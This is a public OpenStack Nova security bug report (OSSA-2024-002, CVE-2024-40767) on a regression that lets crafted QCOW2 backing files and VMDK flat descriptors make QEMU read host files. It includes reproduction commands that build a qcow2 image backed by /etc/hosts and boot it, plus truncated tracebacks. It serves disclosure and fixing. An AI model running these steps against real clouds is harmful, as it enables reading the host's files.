[OSSA-2024-002] Incomplete file access fix and regression for QCOW2 backing files and VMDK flat descriptors (CVE-2024-40767)
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
OpenStack Compute (nova) |
Fix Released
|
Critical
|
Unassigned | ||
OpenStack Security Advisory |
Fix Released
|
High
|
Jeremy Stanley |
Bug Description
When fixing bug #2059809, a regression of the previous bug #1996188 has been introduced.
TLDR: nova is allowing back VMDK with wrong types and QCOW with backing files.
Long:
The following steps were used to reproduce on a Bobcat (2023.2) OpenStack + nova patches for bug #2059809 (not yet merge when writing this report)
Create a vmdk file:
$ qemu-img create -f vmdk disk-vmdk.vmdk 1M -o subformat=
$ sed -i -r 's|disk-
Create a faulty qcow image:
$ qemu-img create -f qcow2 -F raw -b /etc/hosts disk-bf.qcow2 1M
Upload both images as raw (the default)
$ for i in disk-bf.qcow2 disk-vmdk.vmdk ; do openstack image create --file $i $i ; done
Boot an instance from those images:
$ openstack server create --flavor small --image disk-vmdk.vmdk --net public disk-vmdk.vmdk
$ openstack server create --flavor small --image disk-bf.qcow2 --net public disk-bf.qcow2
Results
=======
VMDK monolithicFlat
-------------------
Traceback (most recent call last):
File "/usr/lib/
self.
File "/usr/lib/
created_
File "/usr/lib/
created_disks = self._create_
File "/usr/lib/
self.
File "/usr/lib/
image.
File "/usr/lib/
self.
File "/usr/lib/
copy_
File "/usr/lib/
return f(*args, **kwargs)
File "/usr/lib/
self.
File "/usr/lib/
disk.
File "/usr/lib/
processutil
File "/usr/lib/
raise ProcessExecutio
oslo_concurrenc
Command: qemu-img resize /var/lib/
Exit code: 1
Stdout: ''
Stderr: "qemu-img: Could not open '/var/lib/
Qemu tried to read /etc/hosts. My system permissions prevented it, but nova did nothing about it: wrong.
QEMU Backing File
-----------------
Traceback (most recent call last):
File "/usr/lib/
self.
File "/usr/lib/
self.
File "/usr/lib/
with excutils.
File "/usr/lib/
self.
File "/usr/lib/
raise self.value
File "/usr/lib/
guest = self._create_guest(
File "/usr/lib/
guest.
File "/usr/lib/
with excutils.
File "/usr/lib/
self.
File "/usr/lib/
raise self.value
File "/usr/lib/
return self._domain.
File "/usr/lib/
result = proxy_call(
File "/usr/lib/
rv = execute(f, *args, **kwargs)
File "/usr/lib/
six.reraise(c, e, tb)
File "/usr/lib/
raise value
File "/usr/lib/
rv = meth(*args, **kwargs)
File "/usr/lib/
raise libvirtError(
libvirt.
In libvirtd journalctl:
Jul 02 20:22:44 compute-1 libvirtd[959438]: internal error: Child process (LIBVIRT_
Here it's apparmor that prevented the boot, but nova should have catched it: wrong
Expected results
----------------
Nova should raise an exception like it does previously.
E.G. for VMDK: nova.exception.
CVE References
description: | updated |
Changed in ossa: | |
status: | New → Incomplete |
summary: |
- Regression VMDK/qcow arbitrary file access + Regression VMDK/qcow arbitrary file access (CVE-2024-40767) |
summary: |
- Regression VMDK/qcow arbitrary file access (CVE-2024-40767) + Incomplete file access fix and regression for QCOW2 backing files and + VMDK flat descriptors (CVE-2024-40767) |
summary: |
- Incomplete file access fix and regression for QCOW2 backing files and - VMDK flat descriptors (CVE-2024-40767) + [OSSA-2024-002] Incomplete file access fix and regression for QCOW2 + backing files and VMDK flat descriptors (CVE-2024-40767) |
description: | updated |
information type: | Private Security → Public Security |
Changed in ossa: | |
importance: | Undecided → High |
assignee: | nobody → Jeremy Stanley (fungi) |
This patch removes the explicit format passed to qemu-img in favor of a comparison with format_inspector after the fact. This means we still get a "sniff test" of what qemu thinks the image is, to catch things that are masquerading as raw images but contain more complex formats inside that qemu may later try to interpret. It's yet another compromise in front of the real fix we need, which is a refactor of the whole image backend system to make this comprehensively better.
I'll let Arnaud speak officially for himself, but I received feedback from him that this squashes the known cases of this bug already.